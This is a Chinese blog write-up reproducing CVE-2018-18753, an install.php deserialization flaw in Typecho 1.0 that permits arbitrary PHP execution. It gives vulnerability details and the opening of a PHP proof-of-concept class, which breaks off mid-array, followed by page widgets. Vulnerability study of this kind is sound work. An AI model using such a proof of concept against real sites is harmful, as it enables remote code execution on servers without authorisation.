typecho_14.10.10反序列化漏洞复现

typecho_14.10.10_unserialize _ CVE-2018-18753

说明 内容
漏洞编号 CVE-2018-18753
漏洞名称 Typecho CMS 反序列化漏洞
漏洞评级 高危
影响范围 typecho1.0(14.10.10)
漏洞描述 typecho是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。
修复方案 升级
打补丁
上设备

漏洞描述

Typecho原本是一款博客系统,其框架体系有别于市面上一般意义MVC框架,主体代码以自创的Widget为基类,整体非常简洁。

typecho是博客CMS,前台install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任意PHP 代码。

漏洞等级

高危

影响版本

  • typecho1.0(14.10.10)

漏洞复现

基础环境

组件 版本
OS windows server 2016
Web Server chrome
typecho 14.10.10

漏洞验证

  1. 编写POC

    <?php
    class Typecho_Feed{
         
         
    	const RSS1 = 'RSS 1.0';
    	const RSS2 = 'RSS 2.0';
    	const ATOM1 = 'ATOM 1.0';
       	const DATE_RFC822 = 'r';
    	const DATE_W3CDTF = 'c';
    	const EOL = "\n";
    	private $_type;
    	private $_items;
    	
    	public function __construct(){
         
         
    		$this->_type = $this::RSS2;
    		$this->_items[0] = array(
    			'title' => 
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值